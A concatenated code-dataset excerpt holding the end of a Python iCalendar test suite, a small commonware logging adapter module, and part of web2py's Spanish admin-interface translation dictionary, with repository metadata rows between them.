((1986, 6, 12, 12, 42, 0), ('EDT', (0, 3600), (-1, 72000))),
])
def property_to_string(prop_name, prop):
"""Method only used by test_load and test_load2.
"""
# Convert DateTimes
prop_value = prop.value
if type(prop.value) is datetime:
params = prop.parameters
if params:# and prop.parameters.has_key('VALUE'):
t = params['VALUE'][0] if params.has_key('VALUE') else None
else:
t = None
prop_value = DateTime.encode(prop.value, type=t)
# Simple case
if not prop.parameters:
return u'%s:%s' % (prop_name, prop_value)
# Params
params = ''
for p_name in prop.parameters:
p_value = prop.parameters[p_name]
p_value = [ encode_param_value(p_name, x, String) for x in p_value ]
param = ';%s=%s' % (p_name, ','.join(p_value))
params = params + param
return u'%s%s:%s' % (prop_name, params, prop_value)
class icalTestCase(TestCase):
def setUp(self):
self.cal1 = iCalendar(string=content)
self.cal2 = iCalendar(string=content2)
def test_new(self):
cal = iCalendar()
properties = []
for name in cal.properties:
params = cal.properties[name].parameters
value = cal.properties[name].value
property = '%s;%s:%s' % (name, params, value)
properties.append(property)
# Test properties
expected_properties = [
u'VERSION;None:2.0',
u'PRODID;None:-//hforge.org/NONSGML ikaaro icalendar V1.0//EN']
self.assertEqual(properties, expected_properties)
# Test components
self.assertEqual(len(cal.get_components()), 0)
self.assertEqual(cal.get_components('VEVENT'), [])
def test_property(self):
"""Test to create, access and encode a property with or without
parameters.
"""
# Property without parameter
expected = ['SUMMARY:This is the summary\n']
property_value = Property('This is the summary')
output = self.cal1.encode_property('SUMMARY', property_value)
self.assertEqual(output, expected)
# Property with one parameter
expected = ['ATTENDEE;MEMBER="mailto:[email protected]":'
'mailto:[email protected]\n']
member = 'mailto:[email protected]'
value = Property('mailto:[email protected]', MEMBER=[member])
output = self.cal1.encode_property('ATTENDEE', value)
self.assertEqual(output, expected)
def test_get_property_values(self):
cal = self.cal1
# icalendar property
expected = '2.0'
property = cal.get_property_values('VERSION')
self.assertEqual(property.value, expected)
# Component property
events = cal.get_components('VEVENT')
properties = events[0].get_version()
expected = u'Résumé'
property = events[0].get_property_values('SUMMARY')
self.assertEqual(property.value, expected)
expected = 1
property = events[0].get_property_values('PRIORITY')
self.assertEqual(property.value, expected)
# Component properties
properties = {}
properties['MYADD'] = Property(u'Résumé à crêtes')
value = Property(u'Property added by calling add_property')
properties['DESCRIPTION'] = value
member = '"mailto:[email protected]"'
value = Property('mailto:[email protected]', MEMBER=[member])
properties['ATTENDEE'] = value
uid = cal.add_component('VEVENT', **properties)
event = cal.get_component_by_uid(uid)
properties = event.get_property_values()
self.assertEqual('MYADD' in properties, True)
self.assertEqual('DESCRIPTION' in properties, True)
self.assertEqual('ATTENDEE' in properties, True)
self.assertEqual('VERSION' in properties, False)
def test_add_to_calendar(self):
"""Test to add property and component to an empty icalendar object.
"""
cal = iCalendar()
cal.add_component('VEVENT')
self.assertEqual(len(cal.get_components('VEVENT')), 1)
value = Property('PUBLISH')
cal.set_property('METHOD', value)
self.assertEqual(cal.get_property_values('METHOD'), value)
def test_load(self):
"""Test loading a simple calendar.
"""
cal = self.cal1
# Test icalendar properties
properties = []
for name in cal.properties:
property_value = cal.properties[name]
# Only property METHOD can occur several times, we give only one
if isinstance(property_value, list):
property_value = property_value[0]
params = property_value.parameters
value = property_value.value
property = '%s;%s:%s' % (name, params, value)
properties.append(property)
expected_properties = [
u'VERSION;None:2.0',
u'METHOD;None:PUBLISH',
u'PRODID;None:-//Mozilla.org/NONSGML Mozilla Calendar V1.0//EN' ]
self.assertEqual(properties, expected_properties)
# Test component properties
properties = []
event = cal.get_components('VEVENT')[0]
version = event.get_version()
for prop_name in version:
datatype = cal.get_record_datatype(prop_name)
if datatype.multiple is False:
prop = version[prop_name]
property = property_to_string(prop_name, prop)
properties.append(property)
else:
for prop in version[prop_name]:
property = property_to_string(prop_name, prop)
properties.append(property)
expected_event_properties = [
u'STATUS:TENTATIVE',
u'DTSTAMP:20050601T074604Z',
u'DESCRIPTION:all all all',
u'ATTENDEE;MEMBER="mailto:[email protected]"'
';RSVP=TRUE:mailto:[email protected]',
u'ATTENDEE;MEMBER="mailto:[email protected]"'
':mailto:[email protected]',
u'SUMMARY:Résumé',
u'PRIORITY:1',
u'LOCATION:France',
u'X-MOZILLA-RECUR-DEFAULT-INTERVAL:0',
u'DTEND;VALUE=DATE:20050531',
u'DTSTART;VALUE=DATE:20050530',
u'CLASS:PRIVATE']
self.assertEqual(event.uid, '581361a0-1dd2-11b2-9a42-bd3958eeac9a')
self.assertEqual(properties, expected_event_properties)
self.assertEqual(len(cal.get_components('VEVENT')), 1)
# Test journals
self.assertEqual(len(cal.get_components('VJOURNAL')), 0)
# Test todos
self.assertEqual(len(cal.get_components('TODO')), 0)
# Test freebusys
self.assertEqual(len(cal.get_components('FREEBUSY')), 0)
# Test timezones
self.assertEqual(len(cal.get_components('TIMEZONE')), 0)
# Test others
self.assertEqual(len(cal.get_components('others')), 0)
def test_load_2(self):
"""Test loading a 2 events calendar.
"""
cal = self.cal2
properties = []
for name in cal.properties:
params = cal.properties[name].parameters
value = cal.properties[name].value
property = '%s;%s:%s' % (name, params, value)
properties.append(property)
# Test properties
expected_properties = [
u'VERSION;None:2.0',
u'METHOD;None:PUBLISH',
u'PRODID;None:-//Mozilla.org/NONSGML Mozilla Calendar V1.0//EN' ]
self.assertEqual(properties, expected_properties)
events = []
for event in cal.get_components('VEVENT'):
version = event.get_version()
properties = []
for prop_name in version:
if prop_name == 'DTSTAMP':
continue
datatype = cal.get_record_datatype(prop_name)
if datatype.multiple is False:
prop = version[prop_name]
property = property_to_string(prop_name, prop)
properties.append(property)
else:
for prop in version[prop_name]:
property = property_to_string(prop_name, prop)
properties.append(property)
events.append(properties)
# Test events
expected_events = [
[u'ATTENDEE;MEMBER="mailto:[email protected]";RSVP=TRUE'
u':mailto:[email protected]',
u'SUMMARY:222222222',
u'PRIORITY:2',
u'DTEND;VALUE=DATE:20050701',
u'DTSTART;VALUE=DATE:20050701'],
[u'STATUS:TENTATIVE',
u'DESCRIPTION:all all all',
u'ATTENDEE;MEMBER="mailto:[email protected]"'
u';RSVP=TRUE:mailto:[email protected]',
u'SUMMARY:Refound',
u'PRIORITY:1',
u'LOCATION:France',
u'X-MOZILLA-RECUR-DEFAULT-INTERVAL:0',
u'DTEND;VALUE=DATE:20050531',
u'DTSTART;VALUE=DATE:20050530',
u'CLASS:PRIVATE'],
]
self.assertEqual(events, expected_events)
self.assertEqual(len(cal.get_components('VEVENT')), 2)
# Test journals
self.assertEqual(len(cal.get_components('VJOURNAL')), 0)
# Test todos
self.assertEqual(len(cal.get_components('TODO')), 0)
# Test freebusys
self.assertEqual(len(cal.get_components('FREEBUSY')), 0)
# Test timezones
self.assertEqual(len(cal.get_components('TIMEZONE')), 0)
# Test others
self.assertEqual(len(cal.get_components('others')), 0)
# Just call to_str method
def test_to_str(self):
"""Call to_str method.
"""
cal = self.cal2
cal.to_str()
def test_add_property(self):
"""Test adding a property to any component.
"""
cal = self.cal2
event = cal.get_components('VEVENT')[1]
# other property (MYADD)
name, value = 'MYADD', Property(u'Résumé à crêtes')
cal.update_component(event.uid, **{name: value})
property = event.get_property_values(name)
self.assertEqual(property[0], value)
self.assertEqual(property[0].value, value.value)
# property DESCRIPTION
name = 'DESCRIPTION'
value = Property(u'Property added by calling add_property')
cal.update_component(event.uid, **{name: value})
property = event.get_property_values(name)
self.assertEqual(property, value)
# property ATTENDEE
name = 'ATTENDEE'
value = event.get_property_values(name)
member = '"mailto:[email protected]"'
value.append(Property('mailto:[email protected]', MEMBER=[member]))
cal.update_component(event.uid, **{name: value})
property = event.get_property_values(name)
self.assertEqual(str(property[0].value), 'mailto:[email protected]')
self.assertEqual(property[1].parameters, {'MEMBER': [member]})
self.assertEqual(property[1], value[1])
def test_icalendar_set_property(self):
"""Test setting a new value to an existant icalendar property.
"""
cal = self.cal1
name, value = 'VERSION', Property('2.1')
cal.set_property(name, value)
self.assertEqual(cal.get_property_values(name), value)
cal.set_property(name, [value, ])
self.assertEqual(cal.get_property_values(name), value)
def test_component_set_property(self):
"""Test setting a new value to an existant component property.
"""
cal = self.cal1
event = cal.get_components('VEVENT')[0]
name, value = 'SUMMARY', Property('This is a new summary')
cal.update_component(event.uid, **{name: value})
self.assertEqual(event.get_property_values(name), value)
member = '"mailto:[email protected]"'
value = [
Property('mailto:[email protected]', MEMBER=[member]),
Property('mailto:[email protected]'),
Property('mailto:[email protected]')]
cal.update_component(event.uid, ATTENDEE=value)
self.assertEqual(event.get_property_values('ATTENDEE'), value)
def test_vtimezone(self):
handler = iCalendar('tests/test_vtimezone.ics')
tz = handler.get_components('VTIMEZONE')
self.assertEqual(len(tz), 1)
tz = tz[0]
self.assertEqual(tz.__class__, VTimezone)
self.assertTrue(isinstance(tz, tzinfo))
for dt, (tzname, dst, utcoffset) in tz_file_test:
dt = datetime(*dt, tzinfo=tz)
self.assertEqual(tz.tzname(dt), tzname)
self.assertEqual(tz.dst(dt), timedelta(*dst))
self.assertEqual(tz.utcoffset(dt), timedelta(*utcoffset))
if __name__ == '__main__':
main()
| gpl-3.0 | -8,353,791,526,772,927,000 | 33.677489 | 77 | 0.609887 | false |
jsocol/commonware | commonware/log/__init__.py | 1 | 1200 | import logging
# ThreadRequestMiddleware isn't used here but is imported so
# commonware.log.ThreadRequestMiddleware works.
from commonware.log.middleware import get_remote_addr, get_username, ThreadRequestMiddleware # noqa
def getLogger(name=None):
"""
Wrap logging.getLogger to return a LoggerAdapter.
If you need to do anything besides make logging calls, use
logging.getLogger.
"""
logger = logging.getLogger(name)
return CommonwareAdapter(logger)
class CommonwareAdapter(logging.LoggerAdapter):
"""Adds the REMOTE_ADDR and USERNAME to every logging message's kwargs."""
def __init__(self, logger, extra=None):
logging.LoggerAdapter.__init__(self, logger, extra or {})
def process(self, msg, kwargs):
kwargs['extra'] = {'REMOTE_ADDR': get_remote_addr(),
'USERNAME': get_username()}
return msg, kwargs
class Formatter(logging.Formatter):
"""Formatter that makes sure REMOTE_ADDR and USERNAME are available."""
def format(self, record):
for name in 'REMOTE_ADDR', 'USERNAME':
record.__dict__.setdefault(name, '')
return logging.Formatter.format(self, record)
| bsd-3-clause | 8,280,413,131,639,666,000 | 31.432432 | 100 | 0.680833 | false |
urrego093/proyecto_mv | applications/admin/languages/es.py | 1 | 26019 | # -*- coding: utf-8 -*-
{
'!langcode!': 'es',
'!langname!': 'Español',
'"update" is an optional expression like "field1=\'newvalue\'". You cannot update or delete the results of a JOIN': '"actualice" es una expresión opcional como "campo1=\'nuevo_valor\'". No se puede actualizar o eliminar resultados de un JOIN',
'%s %%{row} deleted': '%s filas eliminadas',
'%s %%{row} updated': '%s filas actualizadas',
'%Y-%m-%d': '%Y-%m-%d',
'%Y-%m-%d %H:%M:%S': '%Y-%m-%d %H:%M:%S',
'(requires internet access, experimental)': '(requiere acceso a internet, experimental)',
'(something like "it-it")': '(algo como "it-it")',
'(version %s)': '(version %s)',
'@markmin\x01(file **gluon/contrib/plural_rules/%s.py** is not found)': '(archivo **gluon/contrib/plural_rules/%s.py** no se ha encontrado)',
'@markmin\x01An error occured, please [[reload %s]] the page': 'Ocurrió un error, por favor [[recargue %s]] la página',
'@markmin\x01Number of entries: **%s**': 'Número de entradas: **%s**',
'@markmin\x01Searching: **%s** %%{file}': 'Buscando: **%s** archivos',
'A new version of web2py is available': 'Hay una nueva versión de web2py disponible',
'A new version of web2py is available: %s': 'Hay una nueva versión de web2py disponible: %s',
'About': 'Acerca de',
'About application': 'Acerca de la aplicación',
'additional code for your application': 'código adicional para su aplicación',
'Additional code for your application': 'Código adicional para su aplicación',
'admin disabled because no admin password': 'admin deshabilitado por falta de contraseña',
'admin disabled because not supported on google app engine': 'admin deshabilitado, no es soportado en GAE',
'admin disabled because unable to access password file': 'admin deshabilitado, imposible acceder al archivo con la contraseña',
'Admin is disabled because insecure channel': 'Admin deshabilitado, el canal no es seguro',
'Admin is disabled because unsecure channel': 'Admin deshabilitado, el canal no es seguro',
'Admin language': 'Lenguaje de administración',
'administrative interface': 'interfaz administrativa',
'Administrator Password:': 'Contraseña del Administrador:',
'An error occured, please %s the page': 'Ha ocurrido un error, por favor %s la página',
'and rename it (required):': 'y renombrela (requerido):',
'and rename it:': ' y renombrelo:',
'App does not exist or you are not authorized': 'App does not exist or you are not authorized',
'appadmin': 'appadmin',
'appadmin is disabled because insecure channel': 'admin deshabilitado, el canal no es seguro',
'application "%s" uninstalled': 'aplicación "%s" desinstalada',
'application %(appname)s installed with md5sum: %(digest)s': 'application %(appname)s installed with md5sum: %(digest)s',
'application compiled': 'aplicación compilada',
'Application exists already': 'Application exists already',
'application is compiled and cannot be designed': 'la aplicación está compilada y no puede ser modificada',
'Application name:': 'Nombre de la aplicación:',
'are not used': 'are not used',
'are not used yet': 'are not used yet',
'Are you sure you want to delete file "%s"?': '¿Está seguro que desea eliminar el archivo "%s"?',
'Are you sure you want to delete plugin "%s"?': '¿Está seguro que quiere eliminar el plugin "%s"?',
'Are you sure you want to delete this object?': '¿Está seguro que quiere eliminar este objeto?',
'Are you sure you want to uninstall application "%s"': '¿Está seguro que desea desinstalar la aplicación "%s"',
'Are you sure you want to uninstall application "%s"?': '¿Está seguro que desea desinstalar la aplicación "%s"?',
'Are you sure you want to upgrade web2py now?': '¿Está seguro que desea actualizar web2py ahora?',
'Are you sure?': '¿Está seguro?',
'arguments': 'argumentos',
'at char %s': 'en el carácter %s',
'at line %s': 'en la línea %s',
'ATTENTION: Login requires a secure (HTTPS) connection or running on localhost.': 'ATENCIÓN: Inicio de sesión requiere una conexión segura (HTTPS) o localhost.',
'ATTENTION: TESTING IS NOT THREAD SAFE SO DO NOT PERFORM MULTIPLE TESTS CONCURRENTLY.': 'ATENCIÓN: NO EJECUTE VARIAS PRUEBAS SIMULTANEAMENTE, NO SON THREAD SAFE.',
'ATTENTION: you cannot edit the running application!': 'ATENCIÓN: ¡no puede modificar la aplicación que se ejecuta!',
'Autocomplete': 'Autocompletar',
'Autocomplete Python Code': 'Autocompletar código Python',
'Available databases and tables': 'Bases de datos y tablas disponibles',
'Available Databases and Tables': 'Bases de Datos y Tablas Disponibles',
'back': 'atrás',
'Back to the plugins list': 'Regresar a la lista de plugins',
'Begin': 'Begin',
'breakpoint': 'punto de ruptura',
'breakpoints': 'puntos de ruptura',
'browse': 'navegar',
'Cache': 'Caché',
'cache': 'caché',
'cache, errors and sessions cleaned': 'caché, errores y sesiones eliminados',
'can be a git repo': 'puede ser un repositorio git',
'Cancel': 'Cancelar',
'Cannot be empty': 'No puede estar vacío',
'Cannot compile: there are errors in your app. Debug it, correct errors and try again.': 'No se puede compilar: hay errores en su aplicación. Depure, corrija errores y vuelva a intentarlo.',
'Cannot compile: there are errors in your app:': 'No se puede compilar: hay errores en su aplicación:',
'cannot create file': 'no es posible crear archivo',
'cannot upload file "%(filename)s"': 'no es posible subir archivo "%(filename)s"',
'Change admin password': 'cambie contraseña admin',
'change editor settings': 'cambiar la configuración del editor',
'Change Password': 'Cambie Contraseña',
'check all': 'marcar todos',
'Check for upgrades': 'buscar actualizaciones',
'Check to delete': 'Marque para eliminar',
'Checking for upgrades...': 'Buscando actualizaciones...',
'Clean': 'Limpiar',
'Clear CACHE?': '¿Limpiar CACHÉ?',
'Clear DISK': 'Limpiar DISCO',
'Clear RAM': 'Limpiar RAM',
'click here for online examples': 'haga click aquí para ver ejemplos en línea',
'click here for the administrative interface': 'haga click aquí para usar la interfaz administrativa',
'Click row to expand traceback': 'Click en la fila para expandir el rastreo',
'click to check for upgrades': 'haga clic para buscar actualizaciones',
'click to open': 'click para abrir',
'Client IP': 'IP del Cliente',
'code': 'código',
'Code listing': 'Listado de código',
'collapse/expand all': 'contraer/expandir todo',
'commit (mercurial)': 'confirmar (mercurial)',
'Compile': 'Compilar',
'Compile (all or nothing)': 'Compile (all or nothing)',
'Compile (skip failed views)': 'Compile (skip failed views)',
'compiled application removed': 'aplicación compilada removida',
'continue': 'continuar',
'Controllers': 'Controladores',
'controllers': 'controladores',
'Count': 'Contar',
'Create': 'Crear',
'create file with filename:': 'cree archivo con nombre:',
'Create new application using the Wizard': 'Crear nueva aplicación utilizando el asistente',
'create new application:': 'nombre de la nueva aplicación:',
'Create new simple application': 'Cree una nueva aplicación',
'Create/Upload': 'Crear/Subir',
'created by': 'creado por',
'crontab': 'crontab',
'Current request': 'Solicitud en curso',
'Current response': 'Respuesta en curso',
'Current session': 'Sesión en curso',
'currently running': 'actualmente en ejecución',
'currently saved or': 'actualmente guardado o',
'customize me!': 'Adáptame!',
'data uploaded': 'datos subidos',
'database': 'base de datos',
'database %s select': 'selección en base de datos %s',
'database administration': 'administración base de datos',
'Database Administration (appadmin)': 'Administración de Base de Datos (appadmin)',
'Date and Time': 'Fecha y Hora',
'db': 'db',
'Debug': 'Depurar',
'defines tables': 'definir tablas',
'Delete': 'Eliminar',
'delete': 'eliminar',
'delete all checked': 'eliminar marcados',
'delete plugin': 'eliminar plugin',
'Delete this file (you will be asked to confirm deletion)': 'Elimine este fichero (se le pedirá confirmación)',
'Delete:': 'Eliminar:',
'Demo': 'Demo',
'Deploy': 'Deploy',
'Deploy on Google App Engine': 'Instale en Google App Engine',
'Deploy to OpenShift': 'Instale en OpenShift',
'Deploy to PythonAnywhere': 'Deploy to PythonAnywhere',
'Description': 'Descripción',
'design': 'modificar',
'DESIGN': 'DISEÑO',
'Design for': 'Diseño para',
'Detailed traceback description': 'Descripción detallada del rastreo',
'details': 'detalles',
'direction: ltr': 'dirección: ltr',
'Disable': 'Deshabilitar',
'DISK': 'DISCO',
'Display line numbers': 'Display line numbers',
'docs': 'documentos',
'Docs': 'Documentos',
'Done!': 'Listo!',
'done!': 'listo!',
'Download': 'Descargar',
'download files via http:': 'descargar archivos via http:',
'download layouts': 'descargar layouts',
'Download layouts from repository': 'Download layouts from repository',
'download plugins': 'descargar plugins',
'Download plugins from repository': 'Download plugins from repository',
'E-mail': 'Correo electrónico',
'EDIT': 'EDITAR',
'Edit': 'editar',
'Edit application': 'Editar aplicación',
'edit controller': 'editar controlador',
'edit controller:': 'editar controlador:',
'Edit current record': 'Edite el registro actual',
'Edit Profile': 'Editar Perfil',
'edit views:': 'editar vistas:',
'Editing %s': 'Editando %s',
'Editing file': 'Editando archivo',
'Editing file "%s"': 'Editando archivo "%s"',
'Editing Language file': 'Editando archivo de lenguaje',
'Editing myclientapi': 'Editando myclientapi',
'Editing myemail': 'Editando myemail',
'Editing rbare': 'Editando rbare',
'Editing ul': 'Editando ul',
'Editor': 'Editor',
'Enable': 'Habilitar',
'Enable Close-Tag': 'Enable Close-Tag',
'Enable Code Folding': 'Enable Code Folding',
'Enterprise Web Framework': 'Framework Web Empresarial',
'Error': 'Error',
'Error logs for "%(app)s"': 'Bitácora de errores en "%(app)s"',
'Error snapshot': 'Error snapshot',
'Error ticket': 'Error ticket',
'Errors': 'errores',
'Errors in form, please check it out.': 'Errores en el formulario, verifique por favor.',
'Exception instance attributes': 'Atributos de la instancia de Excepción',
'Exit Fullscreen': 'Salir de pantalla completa',
'Expand Abbreviation': 'Expandir abreviación',
'Expand Abbreviation (html files only)': 'Expandir Abreviación (sólo archivos html)',
'export as csv file': 'exportar como archivo CSV',
'exposes': 'expone',
'exposes:': 'expone:',
'extends': 'extiende',
'failed to compile file because:': 'falló la compilación de archivos debido a:',
'failed to reload module': 'recarga del módulo ha fallado',
'failed to reload module because:': 'no es posible recargar el módulo por:',
'File': 'Archivo',
'file "%(filename)s" created': 'archivo "%(filename)s" creado',
'file "%(filename)s" deleted': 'archivo "%(filename)s" eliminado',
'file "%(filename)s" uploaded': 'archivo "%(filename)s" subido',
'file "%(filename)s" was not deleted': 'archivo "%(filename)s" no fue eliminado',
'file "%s" of %s restored': 'archivo "%s" de %s restaurado',
'file changed on disk': 'archivo modificado en el disco',
'file does not exist': 'archivo no existe',
'file saved on %(time)s': 'archivo guardado %(time)s',
'file saved on %s': 'archivo guardado %s',
'filter': 'filter',
'Find Next': 'Buscar próximo',
'Find Previous': 'Bucar anterior',
'First name': 'Nombre',
'Frames': 'Frames',
'Functions with no doctests will result in [passed] tests.': 'Funciones sin doctests equivalen a pruebas [aceptadas].',
'Git Pull': 'Git Pull',
'Git Push': 'Git Push',
'Globals##debug': 'Globals',
'graph model': 'graficación del modelo',
'Group ID': 'ID de Grupo',
'Hello World': 'Hola Mundo',
'Help': 'ayuda',
'here': 'aquí',
'Hide/Show Translated strings': 'Hide/Show Translated strings',
'Highlight current line': 'Highlight current line',
'htmledit': 'htmledit',
'If the report above contains a ticket number it indicates a failure in executing the controller, before any attempt to execute the doctests. This is usually due to an indentation error or an error outside function code.\nA green title indicates that all tests (if defined) passed. In this case test results are not shown.': 'Si el reporte anterior contiene un número de tiquete este indica un falla en la ejecución del controlador, antes de cualquier intento de ejecutat doctests. Esto generalmente se debe a un error en la indentación o un error por fuera del código de la función.\r\nUn titulo verde indica que todas las pruebas pasaron (si existen). En dicho caso los resultados no se muestran.',
'Image': 'Imagen',
'Import/Export': 'Importar/Exportar',
'includes': 'incluye',
'Indent with tabs': 'Indent with tabs',
'insert new': 'inserte nuevo',
'insert new %s': 'inserte nuevo %s',
'inspect attributes': 'inspeccionar atributos',
'Install': 'Instalar',
'Installation of %(plugin)s for %(app)s': 'Instalación de %(plugin)s para %(app)s',
'Installation of %(plugin)s for %(app)s app': 'Instalación de %(plugin)s para %(app)s app',
'Installed applications': 'Aplicaciones instaladas',
'Interaction at %s line %s': 'Interacción en %s línea %s',
'Interactive console': 'Terminal interactiva',
'internal error': 'error interno',
'Internal State': 'Estado Interno',
'Invalid action': 'Acción inválida',
'Invalid application name': 'Nombre de aplicación no válido',
'Invalid email': 'Correo inválido',
'invalid password': 'contraseña inválida',
'invalid password.': 'contraseña inválida.',
'Invalid Query': 'Consulta inválida',
'invalid request': 'solicitud inválida',
'Invalid request': 'Petición inválida',
'invalid ticket': 'tiquete inválido',
'Key bindings': 'Key bindings',
'Key bindings for ZenCoding Plugin': 'Key bindings para el Plugin ZenCoding',
'Keyboard shortcuts': 'Atajos de teclado',
'language file "%(filename)s" created/updated': 'archivo de lenguaje "%(filename)s" creado/actualizado',
'Language files (static strings) updated': 'Archivos de lenguaje (cadenas estáticas) actualizados',
'languages': 'lenguajes',
'Languages': 'Lenguajes',
'languages updated': 'lenguajes actualizados',
'Last name': 'Apellido',
'Last saved on:': 'Guardado en:',
'License for': 'Licencia para',
'License:': 'Licencia:',
'lists by ticket': 'listas por ticket',
'loading...': 'cargando...',
'locals': 'locals',
'Locals##debug': 'Locals',
'Login': 'Inicio de sesión',
'login': 'inicio de sesión',
'Login to the Administrative Interface': 'Inicio de sesión para la Interfaz Administrativa',
'Logout': 'fin de sesión',
'Lost Password': 'Contraseña perdida',
'manage': 'gestionar',
'Manage': 'Gestionar',
'Manage Cache': 'Administrar Caché',
'merge': 'combinar',
'Models': 'Modelos',
'models': 'modelos',
'Modules': 'Módulos',
'modules': 'módulos',
'Name': 'Nombre',
'new application "%s" created': 'nueva aplicación "%s" creada',
'New Application Wizard': 'New Application Wizard',
'New application wizard': 'Asistente para nueva aplicación',
'new plugin installed': 'nuevo plugin instalado',
'New plugin installed: %s': 'Nuevo plugin instalado: %s',
'New plugin installed: web2py.plugin.attachment.w2p': 'Nuevo plugin instalado: web2py.plugin.attachment.w2p',
'New plugin installed: web2py.plugin.dialog.w2p': 'Nuevo plugin instalado: web2py.plugin.dialog.w2p',
'New plugin installed: web2py.plugin.math2py.w2p': 'Nuevo plugin instalado: web2py.plugin.math2py.w2p',
'New plugin installed: web2py.plugin.timezone.w2p': 'Nuevo plugin instalado: web2py.plugin.timezone.w2p',
'New Record': 'Registro nuevo',
'new record inserted': 'nuevo registro insertado',
'New simple application': 'Nueva aplicación',
'next': 'siguiente',
'next 100 rows': '100 filas siguientes',
'NO': 'NO',
'No databases in this application': 'No hay bases de datos en esta aplicación',
'No Interaction yet': 'No hay interacción',
'no match': 'no encontrado',
'no package selected': 'ningún paquete seleccionado',
'No ticket_storage.txt found under /private folder': 'No se encontró ticket_storage.txt en la carpeta /private',
'online designer': 'diseñador en línea',
'or alternatively': 'o alternativamente',
'Or Get from URL:': 'O obtener desde una URL:',
'or import from csv file': 'o importar desde archivo CSV',
'or provide app url:': 'o provea URL de la aplicación:',
'or provide application url:': 'o provea URL de la aplicación:',
'Origin': 'Origen',
'Original/Translation': 'Original/Traducción',
'Overview': 'Revisión general',
'Overwrite installed app': 'sobreescriba la aplicación instalada',
'Pack all': 'empaquetar todo',
'Pack compiled': 'empaquete compiladas',
'Pack custom': 'empaquetar personalizado',
'pack plugin': 'empaquetar plugin',
'PAM authenticated user, cannot change password here': 'usuario autenticado por PAM, no puede cambiar la contraseña aquí',
'Password': 'Contraseña',
'password changed': 'contraseña cambiada',
'Peeking at file': 'Visualizando archivo',
'Please': 'Por favor',
'Plugin': 'Plugin',
'plugin "%(plugin)s" deleted': 'plugin "%(plugin)s" eliminado',
'Plugin "%s" in application': 'Plugin "%s" en aplicación',
'Plugin page': 'Página del plugin',
'plugins': 'plugins',
'Plugins': 'Plugins',
'Plural-Forms:': 'Plural-Forms:',
'Powered by': 'Este sitio usa',
'previous 100 rows': '100 filas anteriores',
'Private files': 'Archivos privados',
'private files': 'archivos privados',
'Project Progress': 'Progreso del Proyecto',
'Query:': 'Consulta:',
'RAM': 'RAM',
'Rapid Search': 'Búsqueda rápida',
'record': 'registro',
'record does not exist': 'el registro no existe',
'record id': 'id de registro',
'Record ID': 'ID de Registro',
'refresh': 'recargar',
'Register': 'Regístrese',
'Registration key': 'Contraseña de Registro',
'reload': 'recargar',
'Reload routes': 'Recargar rutas',
'Remove compiled': 'eliminar compilados',
'Removed Breakpoint on %s at line %s': 'Eliminado punto de ruptura en %s en la línea %s',
'Replace': 'Reemplazar',
'Replace All': 'Reemplazar todos',
'Repository (%s)': 'Repositorio (%s)',
'Repository: %s': 'Repositorio: %s',
'request': 'petición',
'Resolve Conflict file': 'archivo Resolución de Conflicto',
'response': 'respuesta',
'restore': 'restaurar',
'return': 'return',
'revert': 'revertir',
'Role': 'Rol',
'Rows in table': 'Filas en la tabla',
'Rows selected': 'Filas seleccionadas',
'rules are not defined': 'reglas no están definidas',
'Run tests in this file': 'Ejecute tests en este archivo',
"Run tests in this file (to run all files, you may also use the button labelled 'test')": "Ejecute tests en este archivo (para ejecutarlo en todos los archivos, podrías usar el botón etiquetado como 'test')",
'Running on %s': 'Ejecutando en %s',
'Save': 'Guardar',
'save': 'guardar',
'Save file:': 'Guardar archivo:',
'Save file: %s': 'Guardar archivo: %s',
'Save via Ajax': 'Guardar vía Ajax',
'Saved file hash:': 'Hash del archivo guardado:',
'Screenshot %s': 'Screenshot %s',
'Screenshots': 'Screenshots',
'selected': 'seleccionado(s)',
'session': 'sesión',
'session expired': 'sesión expirada',
'Set Breakpoint on %s at line %s: %s': 'Establecer punto de ruptura en %s en la línea %s: %s',
'shell': 'shell',
'Site': 'sitio',
'some files could not be removed': 'algunos archivos no pudieron ser removidos',
'source : filesystem': 'fuente : sistema de archivos',
'Start a new app': 'Start a new app',
'Start searching': 'Iniciar búsqueda',
'Start wizard': 'Iniciar asistente',
'state': 'estado',
'Static': 'Estáticos',
'static': 'estáticos',
'Static files': 'Archivos estáticos',
'Statistics': 'Estadísticas',
'step': 'paso',
'stop': 'parar',
'submit': 'enviar',
'Submit': 'Enviar',
'Success!': '¡Éxito!',
'successful': 'exitoso',
'Sure you want to delete this object?': '¿Está seguro que desea eliminar este objeto?',
'switch to : db': 'cambiar a : db',
'Tab width (# characters)': 'Tab width (# characters)',
'table': 'tabla',
'Table name': 'Nombre de la tabla',
'test': 'probar',
'Testing application': 'Probando aplicación',
'The "query" is a condition like "db.table1.field1==\'value\'". Something like "db.table1.field1==db.table2.field2" results in a SQL JOIN.': 'La "consulta" es una condición como "db.tabla1.campo1==\'valor\'". Algo como "db.tabla1.campo1==db.tabla2.campo2" resulta en un JOIN SQL.',
'The application logic, each URL path is mapped in one exposed function in the controller': 'La lógica de la aplicación, cada ruta URL se mapea en una función expuesta en el controlador',
'the application logic, each URL path is mapped in one exposed function in the controller': 'la lógica de la aplicación, cada ruta URL se mapea en una función expuesta en el controlador',
'the data representation, define database tables and sets': 'la representación de datos, define tablas y conjuntos de base de datos',
'The data representation, define database tables and sets': 'La representación de datos, define tablas y conjuntos de base de datos',
'The presentations layer, views are also known as templates': 'La capa de presentación, las vistas también son llamadas plantillas',
'the presentations layer, views are also known as templates': 'la capa de presentación, las vistas también son llamadas plantillas',
'Theme': 'Theme',
'There are no controllers': 'No hay controladores',
'There are no models': 'No hay modelos',
'There are no modules': 'No hay módulos',
'There are no plugins': 'No hay plugins',
'There are no private files': 'No hay archivos privados',
'There are no static files': 'No hay archivos estáticos',
'There are no translators, only default language is supported': 'No hay traductores, sólo el lenguaje por defecto es soportado',
'There are no views': 'No hay vistas',
'These files are not served, they are only available from within your app': 'Estos archivos no se proveen, ellos sólo están disponibles para su aplicación',
'These files are served without processing, your images go here': 'Estos archivos se proveen sin procesar, sus imágenes van aquí',
'these files are served without processing, your images go here': 'estos archivos se proveen sin procesar, sus imágenes van aquí',
'This is the %(filename)s template': 'Está es la plantilla %(filename)s',
'this page to see if a breakpoint was hit and debug interaction is required.': 'esta página para ver si un punto de ruptura fue configurado y la depuración es requerida.',
'Ticket': 'Ticket',
'Ticket ID': 'Ticket ID',
'Timestamp': 'Timestamp',
'TM': 'MR',
'to previous version.': 'a la versión previa.',
'To create a plugin, name a file/folder plugin_[name]': 'Para crear un plugin, nombre un archivo/carpeta plugin_[nombre]',
'To emulate a breakpoint programatically, write:': 'Para emular un punto de ruptura programáticamente, escriba',
